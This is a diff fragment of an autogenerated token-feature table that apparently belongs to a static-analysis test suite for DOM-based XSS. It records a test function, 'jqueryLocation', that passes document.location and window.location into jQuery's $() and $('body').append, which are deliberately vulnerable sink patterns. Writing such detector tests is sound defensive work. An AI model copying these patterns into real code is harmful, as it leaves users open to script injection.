contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:274:23:274:30 | location | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:274:23:274:30 | location | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:274:23:274:30 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:275:9:275:12 | loc3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:275:9:275:12 | loc3 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:275:9:275:12 | loc3 | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:275:9:275:12 | loc3 | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:275:9:275:12 | loc3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:275:9:275:32 | loc3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:275:9:275:32 | loc3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:275:9:275:32 | loc3 | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:275:9:275:32 | loc3 | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:275:9:275:32 | loc3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:275:9:275:32 | loc3 = ... ocation | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:275:9:275:32 | loc3 = ... ocation | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:275:9:275:32 | loc3 = ... ocation | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:275:9:275:32 | loc3 = ... ocation | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:275:9:275:32 | loc3 = ... ocation | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:275:16:275:23 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:275:16:275:23 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:275:16:275:23 | document | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:275:16:275:23 | document | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:275:16:275:23 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:275:16:275:32 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:275:16:275:32 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:275:16:275:32 | document.location | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:275:16:275:32 | document.location | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:275:16:275:32 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:275:25:275:32 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:275:25:275:32 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:275:25:275:32 | location | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:275:25:275:32 | location | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:275:25:275:32 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:276:5:276:5 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:276:5:276:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:276:5:276:5 | $ | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:276:5:276:5 | $ | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:276:5:276:5 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:276:5:276:11 | $(loc1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:276:5:276:11 | $(loc1) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:276:5:276:11 | $(loc1) | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:276:5:276:11 | $(loc1) | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:276:5:276:11 | $(loc1) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:276:5:276:11 | exceptional return of $(loc1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:276:5:276:11 | exceptional return of $(loc1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:276:5:276:11 | exceptional return of $(loc1) | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:276:5:276:11 | exceptional return of $(loc1) | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:276:5:276:11 | exceptional return of $(loc1) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:276:7:276:10 | loc1 | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:276:7:276:10 | loc1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:276:7:276:10 | loc1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17118,6 +118854,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:276:7:276:10 | loc1 | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | | autogenerated/Xss/DomBasedXss/tst.js:276:7:276:10 | loc1 | enclosingFunctionName | jqueryLocation | | autogenerated/Xss/DomBasedXss/tst.js:276:7:276:10 | loc1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:277:5:277:5 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:277:5:277:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:277:5:277:5 | $ | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:277:5:277:5 | $ | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:277:5:277:5 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:277:5:277:11 | $(loc2) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:277:5:277:11 | $(loc2) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:277:5:277:11 | $(loc2) | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:277:5:277:11 | $(loc2) | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:277:5:277:11 | $(loc2) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:277:5:277:11 | exceptional return of $(loc2) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:277:5:277:11 | exceptional return of $(loc2) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:277:5:277:11 | exceptional return of $(loc2) | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:277:5:277:11 | exceptional return of $(loc2) | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:277:5:277:11 | exceptional return of $(loc2) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:277:7:277:10 | loc2 | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:277:7:277:10 | loc2 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:277:7:277:10 | loc2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17125,6 +118876,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:277:7:277:10 | loc2 | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | | autogenerated/Xss/DomBasedXss/tst.js:277:7:277:10 | loc2 | enclosingFunctionName | jqueryLocation | | autogenerated/Xss/DomBasedXss/tst.js:277:7:277:10 | loc2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:278:5:278:5 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:278:5:278:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:278:5:278:5 | $ | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:278:5:278:5 | $ | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:278:5:278:5 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:278:5:278:11 | $(loc3) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:278:5:278:11 | $(loc3) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:278:5:278:11 | $(loc3) | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:278:5:278:11 | $(loc3) | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:278:5:278:11 | $(loc3) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:278:5:278:11 | exceptional return of $(loc3) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:278:5:278:11 | exceptional return of $(loc3) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:278:5:278:11 | exceptional return of $(loc3) | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:278:5:278:11 | exceptional return of $(loc3) | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:278:5:278:11 | exceptional return of $(loc3) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:278:7:278:10 | loc3 | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:278:7:278:10 | loc3 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:278:7:278:10 | loc3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17132,6 +118898,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:278:7:278:10 | loc3 | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | | autogenerated/Xss/DomBasedXss/tst.js:278:7:278:10 | loc3 | enclosingFunctionName | jqueryLocation | | autogenerated/Xss/DomBasedXss/tst.js:278:7:278:10 | loc3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:5 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:5 | $ | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:5 | $ | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:5 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:13 | $("body") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:13 | $("body") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:13 | $("body") | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:13 | $("body") | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:13 | $("body") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:13 | exceptional return of $("body") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:13 | exceptional return of $("body") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:13 | exceptional return of $("body") | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:13 | exceptional return of $("body") | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:13 | exceptional return of $("body") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:20 | $("body").append | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | 